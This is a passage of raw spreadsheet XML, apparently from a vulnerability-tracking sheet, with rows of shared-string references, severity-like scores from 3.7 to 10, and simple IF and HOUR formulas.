      <c r="F67" s="4" t="s">
        <v>549</v>
      </c>
      <c r="G67" s="4" t="s">
        <v>550</v>
      </c>
      <c r="H67" s="4">
        <v>5</v>
      </c>
      <c r="I67" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J67" s="4"/>
      <c r="K67" s="4"/>
      <c r="L67" s="4">
        <f>IF(out!$G67="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M67" s="4"/>
      <c r="N67" s="4"/>
      <c r="O67" s="13"/>
      <c r="P67" s="4"/>
      <c r="Q67" s="13">
        <f>HOUR(out!$P67 -out!$N67)</f>
        <v>0</v>
      </c>
      <c r="R67" s="18"/>
      <c r="S67" s="4"/>
      <c r="T67" s="4"/>
      <c r="U67" s="4"/>
      <c r="V67" s="7"/>
    </row>
    <row r="68" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A68" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B68" s="4" t="s">
        <v>551</v>
      </c>
      <c r="C68" s="4" t="s">
        <v>552</v>
      </c>
      <c r="D68" s="4" t="s">
        <v>553</v>
      </c>
      <c r="E68" s="4" t="s">
        <v>554</v>
      </c>
      <c r="F68" s="4" t="s">
        <v>555</v>
      </c>
      <c r="G68" s="4" t="s">
        <v>556</v>
      </c>
      <c r="H68" s="4">
        <v>5</v>
      </c>
      <c r="I68" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J68" s="4"/>
      <c r="K68" s="4"/>
      <c r="L68" s="4">
        <f>IF(out!$G68="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M68" s="4"/>
      <c r="N68" s="4"/>
      <c r="O68" s="13"/>
      <c r="P68" s="4"/>
      <c r="Q68" s="13">
        <f>HOUR(out!$P68 -out!$N68)</f>
        <v>0</v>
      </c>
      <c r="R68" s="18"/>
      <c r="S68" s="4"/>
      <c r="T68" s="4"/>
      <c r="U68" s="4"/>
      <c r="V68" s="7"/>
    </row>
    <row r="69" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A69" s="3" t="s">
        <v>544</v>
      </c>
      <c r="B69" s="4" t="s">
        <v>557</v>
      </c>
      <c r="C69" s="4" t="s">
        <v>558</v>
      </c>
      <c r="D69" s="4" t="s">
        <v>559</v>
      </c>
      <c r="E69" s="4" t="s">
        <v>560</v>
      </c>
      <c r="F69" s="4" t="s">
        <v>561</v>
      </c>
      <c r="G69" s="4" t="s">
        <v>562</v>
      </c>
      <c r="H69" s="4">
        <v>5</v>
      </c>
      <c r="I69" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J69" s="4"/>
      <c r="K69" s="4"/>
      <c r="L69" s="4">
        <f>IF(out!$G69="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M69" s="4"/>
      <c r="N69" s="4"/>
      <c r="O69" s="13"/>
      <c r="P69" s="4"/>
      <c r="Q69" s="13">
        <f>HOUR(out!$P69 -out!$N69)</f>
        <v>0</v>
      </c>
      <c r="R69" s="18"/>
      <c r="S69" s="4"/>
      <c r="T69" s="4"/>
      <c r="U69" s="4"/>
      <c r="V69" s="7"/>
    </row>
    <row r="70" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A70" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B70" s="4" t="s">
        <v>589</v>
      </c>
      <c r="C70" s="4" t="s">
        <v>590</v>
      </c>
      <c r="D70" s="4" t="s">
        <v>591</v>
      </c>
      <c r="E70" s="4" t="s">
        <v>592</v>
      </c>
      <c r="F70" s="4" t="s">
        <v>593</v>
      </c>
      <c r="G70" s="4" t="s">
        <v>594</v>
      </c>
      <c r="H70" s="4">
        <v>8</v>
      </c>
      <c r="I70" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J70" s="4"/>
      <c r="K70" s="4"/>
      <c r="L70" s="4">
        <f>IF(out!$G70="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M70" s="4"/>
      <c r="N70" s="4"/>
      <c r="O70" s="13"/>
      <c r="P70" s="4"/>
      <c r="Q70" s="13">
        <f>HOUR(out!$P70 -out!$N70)</f>
        <v>0</v>
      </c>
      <c r="R70" s="18"/>
      <c r="S70" s="4"/>
      <c r="T70" s="4"/>
      <c r="U70" s="4"/>
      <c r="V70" s="7"/>
    </row>
    <row r="71" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A71" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B71" s="4" t="s">
        <v>622</v>
      </c>
      <c r="C71" s="4" t="s">
        <v>623</v>
      </c>
      <c r="D71" s="4" t="s">
        <v>442</v>
      </c>
      <c r="E71" s="4" t="s">
        <v>443</v>
      </c>
      <c r="F71" s="4" t="s">
        <v>624</v>
      </c>
      <c r="G71" s="4" t="s">
        <v>625</v>
      </c>
      <c r="H71" s="4">
        <v>8</v>
      </c>
      <c r="I71" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J71" s="4"/>
      <c r="K71" s="4"/>
      <c r="L71" s="4">
        <f>IF(out!$G71="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M71" s="4"/>
      <c r="N71" s="4"/>
      <c r="O71" s="13"/>
      <c r="P71" s="4"/>
      <c r="Q71" s="13">
        <f>HOUR(out!$P71 -out!$N71)</f>
        <v>0</v>
      </c>
      <c r="R71" s="18"/>
      <c r="S71" s="4"/>
      <c r="T71" s="4"/>
      <c r="U71" s="4"/>
      <c r="V71" s="7"/>
    </row>
    <row r="72" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A72" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B72" s="4" t="s">
        <v>652</v>
      </c>
      <c r="C72" s="4" t="s">
        <v>653</v>
      </c>
      <c r="D72" s="4" t="s">
        <v>654</v>
      </c>
      <c r="E72" s="4" t="s">
        <v>655</v>
      </c>
      <c r="F72" s="4" t="s">
        <v>656</v>
      </c>
      <c r="G72" s="4" t="s">
        <v>657</v>
      </c>
      <c r="H72" s="4">
        <v>8</v>
      </c>
      <c r="I72" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J72" s="4"/>
      <c r="K72" s="4"/>
      <c r="L72" s="4">
        <f>IF(out!$G72="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M72" s="4"/>
      <c r="N72" s="4"/>
      <c r="O72" s="13"/>
      <c r="P72" s="4"/>
      <c r="Q72" s="13">
        <f>HOUR(out!$P72 -out!$N72)</f>
        <v>0</v>
      </c>
      <c r="R72" s="18"/>
      <c r="S72" s="4"/>
      <c r="T72" s="4"/>
      <c r="U72" s="4"/>
      <c r="V72" s="7"/>
    </row>
    <row r="73" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A73" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B73" s="4" t="s">
        <v>682</v>
      </c>
      <c r="C73" s="4" t="s">
        <v>683</v>
      </c>
      <c r="D73" s="4" t="s">
        <v>684</v>
      </c>
      <c r="E73" s="4" t="s">
        <v>685</v>
      </c>
      <c r="F73" s="4" t="s">
        <v>686</v>
      </c>
      <c r="G73" s="4" t="s">
        <v>687</v>
      </c>
      <c r="H73" s="4">
        <v>8</v>
      </c>
      <c r="I73" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J73" s="4"/>
      <c r="K73" s="4"/>
      <c r="L73" s="4">
        <f>IF(out!$G73="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M73" s="4"/>
      <c r="N73" s="4"/>
      <c r="O73" s="13"/>
      <c r="P73" s="4"/>
      <c r="Q73" s="13">
        <f>HOUR(out!$P73 -out!$N73)</f>
        <v>0</v>
      </c>
      <c r="R73" s="18"/>
      <c r="S73" s="4"/>
      <c r="T73" s="4"/>
      <c r="U73" s="4"/>
      <c r="V73" s="7"/>
    </row>
    <row r="74" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A74" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B74" s="4" t="s">
        <v>699</v>
      </c>
      <c r="C74" s="4" t="s">
        <v>700</v>
      </c>
      <c r="D74" s="4" t="s">
        <v>250</v>
      </c>
      <c r="E74" s="4" t="s">
        <v>251</v>
      </c>
      <c r="F74" s="4" t="s">
        <v>701</v>
      </c>
      <c r="G74" s="4" t="s">
        <v>702</v>
      </c>
      <c r="H74" s="4">
        <v>8</v>
      </c>
      <c r="I74" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J74" s="4"/>
      <c r="K74" s="4"/>
      <c r="L74" s="4">
        <f>IF(out!$G74="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M74" s="4"/>
      <c r="N74" s="4"/>
      <c r="O74" s="13"/>
      <c r="P74" s="4"/>
      <c r="Q74" s="13">
        <f>HOUR(out!$P74 -out!$N74)</f>
        <v>0</v>
      </c>
      <c r="R74" s="18"/>
      <c r="S74" s="4"/>
      <c r="T74" s="4"/>
      <c r="U74" s="4"/>
      <c r="V74" s="7"/>
    </row>
    <row r="75" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A75" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B75" s="4" t="s">
        <v>764</v>
      </c>
      <c r="C75" s="4" t="s">
        <v>765</v>
      </c>
      <c r="D75" s="4" t="s">
        <v>766</v>
      </c>
      <c r="E75" s="4" t="s">
        <v>767</v>
      </c>
      <c r="F75" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G75" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H75" s="4">
        <v>8</v>
      </c>
      <c r="I75" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J75" s="4"/>
      <c r="K75" s="4"/>
      <c r="L75" s="4">
        <f>IF(out!$G75="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M75" s="4"/>
      <c r="N75" s="4"/>
      <c r="O75" s="13"/>
      <c r="P75" s="4"/>
      <c r="Q75" s="13">
        <f>HOUR(out!$P75 -out!$N75)</f>
        <v>0</v>
      </c>
      <c r="R75" s="18"/>
      <c r="S75" s="4"/>
      <c r="T75" s="4"/>
      <c r="U75" s="4"/>
      <c r="V75" s="7"/>
    </row>
    <row r="76" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A76" s="3" t="s">
        <v>768</v>
      </c>
      <c r="B76" s="4" t="s">
        <v>769</v>
      </c>
      <c r="C76" s="4" t="s">
        <v>770</v>
      </c>
      <c r="D76" s="4" t="s">
        <v>771</v>
      </c>
      <c r="E76" s="4" t="s">
        <v>772</v>
      </c>
      <c r="F76" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G76" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H76" s="4"/>
      <c r="I76" s="4"/>
      <c r="J76" s="4"/>
      <c r="K76" s="4"/>
      <c r="L76" s="4">
        <f>IF(out!$G76="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M76" s="4"/>
      <c r="N76" s="4"/>
      <c r="O76" s="13"/>
      <c r="P76" s="4"/>
      <c r="Q76" s="13">
        <f>HOUR(out!$P76 -out!$N76)</f>
        <v>0</v>
      </c>
      <c r="R76" s="18"/>
      <c r="S76" s="4"/>
      <c r="T76" s="4"/>
      <c r="U76" s="4"/>
      <c r="V76" s="7"/>
    </row>
    <row r="77" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A77" s="3" t="s">
        <v>773</v>
      </c>
      <c r="B77" s="4" t="s">
        <v>774</v>
      </c>
      <c r="C77" s="4" t="s">
        <v>775</v>
      </c>
      <c r="D77" s="4" t="s">
        <v>776</v>
      </c>
      <c r="E77" s="4" t="s">
        <v>777</v>
      </c>
      <c r="F77" s="4" t="s">
        <v>778</v>
      </c>
      <c r="G77" s="4" t="s">
        <v>779</v>
      </c>
      <c r="H77" s="4">
        <v>3.7</v>
      </c>
      <c r="I77" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J77" s="4"/>
      <c r="K77" s="4"/>
      <c r="L77" s="4">
        <f>IF(out!$G77="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M77" s="4"/>
      <c r="N77" s="4"/>
      <c r="O77" s="13"/>
      <c r="P77" s="4"/>
      <c r="Q77" s="13">
        <f>HOUR(out!$P77 -out!$N77)</f>
        <v>0</v>
      </c>
      <c r="R77" s="18"/>
      <c r="S77" s="4"/>
      <c r="T77" s="4"/>
      <c r="U77" s="4"/>
      <c r="V77" s="7"/>
    </row>
    <row r="78" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A78" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B78" s="4" t="s">
        <v>781</v>
      </c>
      <c r="C78" s="4" t="s">
        <v>782</v>
      </c>
      <c r="D78" s="4" t="s">
        <v>454</v>
      </c>
      <c r="E78" s="4" t="s">
        <v>455</v>
      </c>
      <c r="F78" s="4" t="s">
        <v>783</v>
      </c>
      <c r="G78" s="4" t="s">
        <v>784</v>
      </c>
      <c r="H78" s="4">
        <v>8.6</v>
      </c>
      <c r="I78" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J78" s="4"/>
      <c r="K78" s="4"/>
      <c r="L78" s="4">
        <f>IF(out!$G78="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M78" s="4"/>
      <c r="N78" s="4"/>
      <c r="O78" s="13"/>
      <c r="P78" s="4"/>
      <c r="Q78" s="13">
        <f>HOUR(out!$P78 -out!$N78)</f>
        <v>0</v>
      </c>
      <c r="R78" s="18"/>
      <c r="S78" s="4"/>
      <c r="T78" s="4"/>
      <c r="U78" s="4"/>
      <c r="V78" s="7"/>
    </row>
    <row r="79" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A79" s="3" t="s">
        <v>785</v>
      </c>
      <c r="B79" s="4" t="s">
        <v>786</v>
      </c>
      <c r="C79" s="4" t="s">
        <v>787</v>
      </c>
      <c r="D79" s="4" t="s">
        <v>788</v>
      </c>
      <c r="E79" s="4" t="s">
        <v>789</v>
      </c>
      <c r="F79" s="4" t="s">
        <v>790</v>
      </c>
      <c r="G79" s="4" t="s">
        <v>791</v>
      </c>
      <c r="H79" s="4">
        <v>9.6</v>
      </c>
      <c r="I79" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J79" s="4"/>
      <c r="K79" s="4"/>
      <c r="L79" s="4">
        <f>IF(out!$G79="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M79" s="4"/>
      <c r="N79" s="4"/>
      <c r="O79" s="13"/>
      <c r="P79" s="4"/>
      <c r="Q79" s="13">
        <f>HOUR(out!$P79 -out!$N79)</f>
        <v>0</v>
      </c>
      <c r="R79" s="18"/>
      <c r="S79" s="4"/>
      <c r="T79" s="4"/>
      <c r="U79" s="4"/>
      <c r="V79" s="7"/>
    </row>
    <row r="80" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A80" s="3" t="s">
        <v>792</v>
      </c>
      <c r="B80" s="4" t="s">
        <v>793</v>
      </c>
      <c r="C80" s="4" t="s">
        <v>794</v>
      </c>
      <c r="D80" s="4" t="s">
        <v>766</v>
      </c>
      <c r="E80" s="4" t="s">
        <v>767</v>
      </c>
      <c r="F80" s="4" t="s">
        <v>795</v>
      </c>
      <c r="G80" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H80" s="4">
        <v>8.1</v>
      </c>
      <c r="I80" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J80" s="4"/>
      <c r="K80" s="4"/>
      <c r="L80" s="4">
        <f>IF(out!$G80="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M80" s="4"/>
      <c r="N80" s="4"/>
      <c r="O80" s="13"/>
      <c r="P80" s="4"/>
      <c r="Q80" s="13">
        <f>HOUR(out!$P80 -out!$N80)</f>
        <v>0</v>
      </c>
      <c r="R80" s="18"/>
      <c r="S80" s="4"/>
      <c r="T80" s="4"/>
      <c r="U80" s="4"/>
      <c r="V80" s="7"/>
    </row>
    <row r="81" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A81" s="3" t="s">
        <v>796</v>
      </c>
      <c r="B81" s="4" t="s">
        <v>797</v>
      </c>
      <c r="C81" s="4" t="s">
        <v>798</v>
      </c>
      <c r="D81" s="4" t="s">
        <v>799</v>
      </c>
      <c r="E81" s="4" t="s">
        <v>800</v>
      </c>
      <c r="F81" s="4" t="s">
        <v>801</v>
      </c>
      <c r="G81" s="4" t="s">
        <v>802</v>
      </c>
      <c r="H81" s="4">
        <v>10</v>
      </c>
      <c r="I81" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J81" s="4"/>
      <c r="K81" s="4"/>
      <c r="L81" s="4">
        <f>IF(out!$G81="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M81" s="4"/>
      <c r="N81" s="4"/>
      <c r="O81" s="13"/>
      <c r="P81" s="4"/>
      <c r="Q81" s="13">
        <f>HOUR(out!$P81 -out!$N81)</f>
        <v>0</v>
      </c>
      <c r="R81" s="18"/>
      <c r="S81" s="4"/>
      <c r="T81" s="4"/>
      <c r="U81" s="4"/>
      <c r="V81" s="7"/>
    </row>
    <row r="82" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A82" s="3" t="s">
        <v>803</v>
      </c>
      <c r="B82" s="4" t="s">
        <v>804</v>
      </c>
      <c r="C82" s="4" t="s">
        <v>805</v>
      </c>
      <c r="D82" s="4" t="s">
        <v>806</v>
      </c>
      <c r="E82" s="4" t="s">
        <v>807</v>
      </c>
      <c r="F82" s="4" t="s">
        <v>808</v>
      </c>
      <c r="G82" s="4" t="s">
        <v>809</v>
      </c>
      <c r="H82" s="4"/>
      <c r="I82" s="4"/>
      <c r="J82" s="4"/>
      <c r="K82" s="4"/>
      <c r="L82" s="4">
        <f>IF(out!$G82="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M82" s="4"/>
      <c r="N82" s="4"/>
      <c r="O82" s="13"/>
      <c r="P82" s="4"/>
      <c r="Q82" s="13">
        <f>HOUR(out!$P82 -out!$N82)</f>
        <v>0</v>
      </c>
      <c r="R82" s="18"/>
      <c r="S82" s="4"/>
      <c r="T82" s="4"/>
      <c r="U82" s="4"/>
      <c r="V82" s="7"/>
    </row>
    <row r="83" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A83" s="3" t="s">
        <v>621</v>
      </c>
      <c r="B83" s="4" t="s">
        <v>810</v>
      </c>
      <c r="C83" s="4" t="s">
        <v>811</v>
      </c>
      <c r="D83" s="4" t="s">
        <v>812</v>
      </c>
      <c r="E83" s="4" t="s">
        <v>813</v>
      </c>
      <c r="F83" s="4" t="s">
        <v>814</v>
      </c>
      <c r="G83" s="4" t="s">
        <v>815</v>
      </c>
      <c r="H83" s="4">
        <v>8.6</v>
      </c>
      <c r="I83" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J83" s="4"/>
      <c r="K83" s="4"/>
      <c r="L83" s="4">
        <f>IF(out!$G83="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M83" s="4"/>
      <c r="N83" s="4"/>
      <c r="O83" s="13"/>
      <c r="P83" s="4"/>
      <c r="Q83" s="13">
        <f>HOUR(out!$P83 -out!$N83)</f>
        <v>0</v>
      </c>
      <c r="R83" s="18"/>
      <c r="S83" s="4"/>
      <c r="T83" s="4"/>
      <c r="U83" s="4"/>
      <c r="V83" s="7"/>
    </row>
    <row r="84" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A84" s="3" t="s">
        <v>816</v>
      </c>
      <c r="B84" s="4" t="s">
        <v>817</v>
      </c>
      <c r="C84" s="4" t="s">
        <v>818</v>
      </c>
      <c r="D84" s="4" t="s">
        <v>819</v>
      </c>
      <c r="E84" s="4" t="s">
        <v>820</v>
      </c>
      <c r="F84" s="4" t="s">
        <v>821</v>
      </c>
      <c r="G84" s="4" t="s">
        <v>822</v>
      </c>
      <c r="H84" s="4">
        <v>5.8</v>
      </c>
      <c r="I84" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J84" s="4"/>
      <c r="K84" s="4"/>
      <c r="L84" s="4">
        <f>IF(out!$G84="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M84" s="4"/>
      <c r="N84" s="4"/>
      <c r="O84" s="13"/>
      <c r="P84" s="4"/>
      <c r="Q84" s="13">
        <f>HOUR(out!$P84 -out!$N84)</f>
        <v>0</v>
      </c>
      <c r="R84" s="18"/>
      <c r="S84" s="4"/>
      <c r="T84" s="4"/>
      <c r="U84" s="4"/>
      <c r="V84" s="7"/>
    </row>
    <row r="85" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A85" s="3" t="s">
        <v>823</v>
      </c>
      <c r="B85" s="4" t="s">
        <v>824</v>
      </c>
      <c r="C85" s="4" t="s">
        <v>825</v>
      </c>
      <c r="D85" s="4" t="s">
        <v>826</v>
      </c>
      <c r="E85" s="4" t="s">
        <v>827</v>
      </c>
      <c r="F85" s="4" t="s">
        <v>828</v>
      </c>
      <c r="G85" s="4" t="s">
        <v>829</v>
      </c>
      <c r="H85" s="4">
        <v>4</v>
      </c>
      <c r="I85" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J85" s="4"/>
      <c r="K85" s="4"/>
      <c r="L85" s="4">
        <f>IF(out!$G85="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M85" s="4"/>
      <c r="N85" s="4"/>
      <c r="O85" s="13"/>
      <c r="P85" s="4"/>
      <c r="Q85" s="13">
        <f>HOUR(out!$P85 -out!$N85)</f>
        <v>0</v>
      </c>
      <c r="R85" s="18"/>
      <c r="S85" s="4"/>
      <c r="T85" s="4"/>
      <c r="U85" s="4"/>
      <c r="V85" s="7"/>
    </row>
    <row r="86" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A86" s="3" t="s">
        <v>830</v>
      </c>
      <c r="B86" s="4" t="s">
        <v>831</v>
      </c>
      <c r="C86" s="4" t="s">
        <v>832</v>
      </c>
      <c r="D86" s="4" t="s">
        <v>833</v>
      </c>
      <c r="E86" s="4" t="s">
        <v>834</v>
      </c>
      <c r="F86" s="4" t="s">
        <v>835</v>
      </c>
      <c r="G86" s="4" t="s">
        <v>836</v>
      </c>
      <c r="H86" s="4">
        <v>5.3</v>
      </c>
      <c r="I86" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J86" s="4"/>
      <c r="K86" s="4"/>
      <c r="L86" s="4">
        <f>IF(out!$G86="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M86" s="4"/>
      <c r="N86" s="4"/>
      <c r="O86" s="13"/>
      <c r="P86" s="4"/>
      <c r="Q86" s="13">
        <f>HOUR(out!$P86 -out!$N86)</f>
        <v>0</v>
      </c>
      <c r="R86" s="18"/>
      <c r="S86" s="4"/>
      <c r="T86" s="4"/>
      <c r="U86" s="4"/>
      <c r="V86" s="7"/>
    </row>
    <row r="87" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A87" s="3" t="s">
        <v>837</v>
      </c>
      <c r="B87" s="4" t="s">
        <v>838</v>
      </c>
      <c r="C87" s="4" t="s">
        <v>839</v>
      </c>
      <c r="D87" s="4" t="s">
        <v>840</v>
      </c>
      <c r="E87" s="4" t="s">
        <v>841</v>
      </c>
      <c r="F87" s="4" t="s">
        <v>842</v>
      </c>
      <c r="G87" s="4" t="s">
        <v>843</v>
      </c>
      <c r="H87" s="4">
        <v>7.5</v>
      </c>
      <c r="I87" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J87" s="4"/>
      <c r="K87" s="4"/>
      <c r="L87" s="4">
        <f>IF(out!$G87="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M87" s="4"/>
      <c r="N87" s="4"/>
      <c r="O87" s="13"/>
      <c r="P87" s="4"/>
      <c r="Q87" s="13">
        <f>HOUR(out!$P87 -out!$N87)</f>
        <v>0</v>
      </c>
      <c r="R87" s="18"/>
      <c r="S87" s="4"/>
      <c r="T87" s="4"/>
      <c r="U87" s="4"/>
      <c r="V87" s="7"/>
    </row>
    <row r="88" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A88" s="3" t="s">
        <v>844</v>
      </c>
      <c r="B88" s="4" t="s">
        <v>845</v>
      </c>
      <c r="C88" s="4" t="s">
        <v>846</v>
      </c>
      <c r="D88" s="4" t="s">
        <v>806</v>
      </c>
      <c r="E88" s="4" t="s">
        <v>807</v>
      </c>
      <c r="F88" s="4" t="s">
        <v>847</v>
      </c>
      <c r="G88" s="4" t="s">
        <v>848</v>
      </c>
      <c r="H88" s="4">
        <v>9.6</v>
      </c>
      <c r="I88" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J88" s="4"/>
      <c r="K88" s="4"/>
      <c r="L88" s="4">
        <f>IF(out!$G88="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M88" s="4"/>
      <c r="N88" s="4"/>
      <c r="O88" s="13"/>
      <c r="P88" s="4"/>
      <c r="Q88" s="13">
        <f>HOUR(out!$P88 -out!$N88)</f>
        <v>0</v>
      </c>
      <c r="R88" s="18"/>
      <c r="S88" s="4"/>
      <c r="T88" s="4"/>
      <c r="U88" s="4"/>
      <c r="V88" s="7"/>
    </row>
    <row r="89" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A89" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B89" s="4" t="s">
        <v>861</v>
      </c>
      <c r="C89" s="4" t="s">
        <v>862</v>
      </c>
      <c r="D89" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E89" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F89" s="4" t="s">
        <v>863</v>
      </c>
      <c r="G89" s="4" t="s">
        <v>864</v>
      </c>
      <c r="H89" s="4">
        <v>5.3</v>
      </c>
      <c r="I89" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J89" s="4"/>
      <c r="K89" s="4"/>
      <c r="L89" s="4">
        <f>IF(out!$G89="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M89" s="4"/>
      <c r="N89" s="4"/>
      <c r="O89" s="13"/>
      <c r="P89" s="4"/>
      <c r="Q89" s="13">
        <f>HOUR(out!$P89 -out!$N89)</f>
        <v>0</v>
      </c>
      <c r="R89" s="18"/>
      <c r="S89" s="4"/>
      <c r="T89" s="4"/>
      <c r="U89" s="4"/>
      <c r="V89" s="7"/>
    </row>
    <row r="90" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A90" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B90" s="4" t="s">
        <v>865</v>
      </c>
      <c r="C90" s="4" t="s">
        <v>866</v>
      </c>
      <c r="D90" s="4" t="s">
        <v>867</v>
      </c>
      <c r="E90" s="4" t="s">
        <v>868</v>
      </c>
      <c r="F90" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G90" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H90" s="4">
        <v>7.5</v>
      </c>
      <c r="I90" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J90" s="4"/>
      <c r="K90" s="4"/>
      <c r="L90" s="4">
        <f>IF(out!$G90="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M90" s="4"/>
      <c r="N90" s="4"/>
      <c r="O90" s="13"/>
      <c r="P90" s="4"/>
      <c r="Q90" s="13">
        <f>HOUR(out!$P90 -out!$N90)</f>
        <v>0</v>
      </c>
      <c r="R90" s="18"/>
      <c r="S90" s="4"/>
      <c r="T90" s="4"/>
      <c r="U90" s="4"/>
      <c r="V90" s="7"/>
    </row>
    <row r="91" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A91" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B91" s="4" t="s">
        <v>869</v>
      </c>
      <c r="C91" s="4" t="s">
        <v>870</v>
      </c>
      <c r="D91" s="4" t="s">
        <v>871</v>
      </c>
      <c r="E91" s="4" t="s">
        <v>872</v>
      </c>
      <c r="F91" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G91" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H91" s="4">
        <v>7.5</v>
      </c>
      <c r="I91" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J91" s="4"/>
      <c r="K91" s="4"/>
      <c r="L91" s="4">
        <f>IF(out!$G91="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M91" s="4"/>
      <c r="N91" s="4"/>
      <c r="O91" s="13"/>
      <c r="P91" s="4"/>
      <c r="Q91" s="13">
        <f>HOUR(out!$P91 -out!$N91)</f>
        <v>0</v>
      </c>
      <c r="R91" s="18"/>
      <c r="S91" s="4"/>
      <c r="T91" s="4"/>
      <c r="U91" s="4"/>
      <c r="V91" s="7"/>
    </row>
    <row r="92" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A92" s="3" t="s">
        <v>898</v>
      </c>
      <c r="B92" s="4" t="s">
        <v>899</v>
      </c>
      <c r="C92" s="4" t="s">
        <v>900</v>
      </c>
      <c r="D92" s="4" t="s">
        <v>901</v>
      </c>
      <c r="E92" s="4" t="s">
        <v>902</v>
      </c>
      <c r="F92" s="4" t="s">
        <v>903</v>
      </c>
      <c r="G92" s="4" t="s">
        <v>904</v>
      </c>
      <c r="H92" s="4">
        <v>9.8000000000000007</v>
      </c>
      <c r="I92" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J92" s="4"/>
      <c r="K92" s="4"/>
      <c r="L92" s="4">
        <f>IF(out!$G92="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M92" s="4"/>
      <c r="N92" s="4"/>
      <c r="O92" s="13"/>
